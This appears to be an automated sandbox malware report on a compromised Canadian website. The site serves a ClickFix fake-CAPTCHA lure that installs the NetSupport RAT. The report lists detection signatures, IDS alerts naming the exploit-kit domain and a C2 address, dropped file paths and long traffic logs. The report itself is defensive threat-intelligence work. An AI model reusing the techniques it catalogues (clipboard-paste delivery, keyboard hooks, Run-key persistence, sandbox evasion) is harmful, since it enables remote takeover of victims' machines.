Windows Analysis Report
http://fountainofhealth.ca

General Information

Sample URL:	http://fountainofhealth.ca
Analysis ID:	1704307
Infos:	yarasigma

Detection

NetSupport RAT, CAPTCHA Scam ClickFix

Score:	96
Range:	0 - 100
Confidence:	100%

Signatures

Detect drive by download via clipboard copy & paste

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected CAPTCHA Scam ClickFix

AI detected suspicious Javascript

HTML page adds supicious text to clipboard

HTML page contains obfuscated javascript

Installs a global event hook (focus changed)

Installs a global keyboard hook

Obfuscated command line found

Abnormal high CPU Usage

Creates a process in suspended mode (likely to inject code)

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTML page contains hidden javascript code

HTTP GET or POST without a user agent

Installs a global mouse hook

May sleep (evasive loops) to hinder dynamic analysis

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Conhost Spawned By Uncommon Parent Process

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Usage Of Web Request Commands And Cmdlets

Uses reg.exe to modify the Windows registry

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Classification

Signatures

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe	ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Roaming\Dire\remcmdstub.exe	ReversingLabs: Detection: 16%

Phishing

Yara detected CAPTCHA Scam ClickFix

Source: Yara match

File source: 0.6.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.355..script.csv	Joe Sandbox AI: detected suspicious Javascript with a risk score 93.0%.
Source: 0.351..script.csv	Joe Sandbox AI: detected suspicious Javascript with a risk score 86.8%.

HTML page contains obfuscated javascript

Source: https://3dmaine.com/d.js

HTTP Parser: (function(_0x56c4d6,_0x1184e4){const _0x47dcd9=_0x11e7,_0x1961fe=_0x56c4d6();while(!![]){try{const _

HTML page contains hidden javascript code

Source: https://fountainofhealth.ca/en

HTTP Parser: Base64 decoded: 1748893175.000000

Source: https://fountainofhealth.ca/en	HTTP Parser: No favicon
Source: https://fountainofhealth.ca/en	HTTP Parser: No favicon
Source: https://fountainofhealth.ca/en	HTTP Parser: No favicon

Source: C:\Users\user\AppData\Roaming\Dire\client32.exe

File opened: C:\Users\user\AppData\Roaming\Dire\MSVCR100.dll

Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.168.117.169:443 -> 192.168.2.16:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.6.254:443 -> 192.168.2.16:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.136.254:443 -> 192.168.2.16:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.208.236.117:443 -> 192.168.2.16:49783 version: TLS 1.2

Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: PCICHEK.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: PCICL32.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000020.00000000.1486224969.00000000007C2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: pcicapi.dll.31.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.31.dr
Source:	Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb@ source: hw.dll.31.dr
Source:	Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb source: hw.dll.31.dr
Source:	Binary string: F:\project\delphi\itop\ipv6chek\Release\DllForIpv6.pdb source: pnf1.dll1.31.dr, pnf1.dll0.31.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2062661 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (3dmaine .com) : 192.168.2.16:51757 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2062663 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (3dmaine .com) : 192.168.2.16:49722 -> 107.180.51.102:443
Source: Network traffic	Suricata IDS: 2062661 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (3dmaine .com) : 192.168.2.16:61172 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49773 -> 94.158.245.140:443
Source: Network traffic	Suricata IDS: 2035894 - Severity 1 - ET MALWARE NetSupport RAT with System Information : 192.168.2.16:49773 -> 94.158.245.140:443

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=o&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=0a7fb7675443474b93e6e79ff4d6eb08 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=on&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=684fe7139df74817b053fa7d309b3c6b HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-s
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=ons&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=922546595914451b8005161047e609ff HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=onsc&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=4&cvid=217cd2d9ed0242d9bc133d077d32033c&ig=41ddb61898e64595a74bb49d95e07614 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time

Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.169
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.169
Source: unknown	TCP traffic detected without corresponding DNS query: 52.168.117.169
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208

Source: global traffic	HTTP traffic detected: GET /chrome-variations/seed?osname=win&channel=stable&milestone=134 HTTP/1.1host: clientservices.googleapis.comif-none-match: SMChYyMDI1MDMwNi0xODMwMDQuNDI5MDAwEgkIABADGIYBIAA=#qBr8j3G36+k=a-im: x-bm,gzipsec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: gzip, deflate, br, zstdpriority: u=4, i
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1host: fountainofhealth.caupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /en HTTP/1.1host: fountainofhealth.caupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"accept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/speculation HTTP/1.1host: fountainofhealth.caorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: speculationrulesreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/resizable.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/core.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/modules/views/css/views-responsive-grid.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /modules/ajax_loader/css/throbber-general.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/controlgroup.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/checkboxradio.css?swwsy8 HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1host: fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/enaccept-encoding: gzip, deflate, br, zstdaccept-language: en-US,en;q=0.9priority: u=2
